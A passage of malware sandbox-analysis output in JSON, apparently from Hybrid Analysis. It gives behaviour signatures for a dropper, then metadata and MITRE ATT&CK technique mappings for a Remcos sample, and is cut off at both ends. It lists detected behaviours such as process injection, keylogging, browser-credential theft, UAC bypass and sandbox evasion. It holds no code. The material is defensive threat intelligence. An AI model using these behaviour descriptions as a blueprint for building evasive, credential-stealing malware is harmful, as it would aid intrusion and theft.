00000000-00004172)\n \"sibjs.exe\" called \"FileTimeToLocalFileTime\" with parameter 00c15ab0b262db01 & 00291f12bb62db01 (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "api-228", "type": 6, "relevance": 1, "name": "Calls an API typically used to acquire handle to a key container within a CSP", "description": "\"sibjs.exe\" called \"CryptAcquireContextW\" with parameters {\"phProv\": \"d0876100\"\n \"szProvider\": \"Microsoft Enhanced RSA and AES Cryptographic Provider\"\n \"dwProvType\": \"24\"\n \"dwFlags\": \"4026531840\"}\n \"sibjs.exe\" called \"CryptAcquireContextW\" with parameters {\"phProv\": \"58886100\"\n \"szProvider\": \"Microsoft Enhanced RSA and AES Cryptographic Provider\"\n \"dwProvType\": \"24\"\n \"dwFlags\": \"4026531840\"}", "origin": "API Call", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\FutureApp\\0\\Setup.exe\" has high entropy 7.424098989332036\n Dropped file \"%TEMP%\\FutureApp\\Zip.dll\" has high entropy 7.309716180257069", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"sibjs.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"sibjs.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnA8FB.tmp\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\0\\Setup.exe\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\1\\333.exe\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\2\\babka.cmd\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibCa.dll\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibClr.dll\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Zip.dll\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Ionic.Zip.dll\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\sib.dat\" for deletion\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\\siblog.dll\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnA8FB.tmp\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F3.tmp\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F4.tmp\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\0\\Setup.exe\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\1\\333.exe\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\2\\babka.cmd\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibCa.dll\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibClr.dll\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Zip.dll\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Ionic.Zip.dll\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\sib.dat\" with delete access\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\\siblog.dll\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 1500 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" (Handle: 396)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" (Handle: 396)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" (Handle: 396)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\" (Handle: 396)\n \"Sibuia.exe\" wrote 1500 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" (Handle: 308)\n \"Sibuia.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" (Handle: 308)\n \"Sibuia.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" (Handle: 308)\n \"Sibuia.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\" (Handle: 308)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}]}
d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a
https://hybrid-analysis.com/sample/d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a
Hybrid Analysis - Remcos
{"size": 494080, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a", "sha256": "d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 223, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00005960", "name": "d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe", "normalized_path": "C:\\d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe", "sha256": "d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 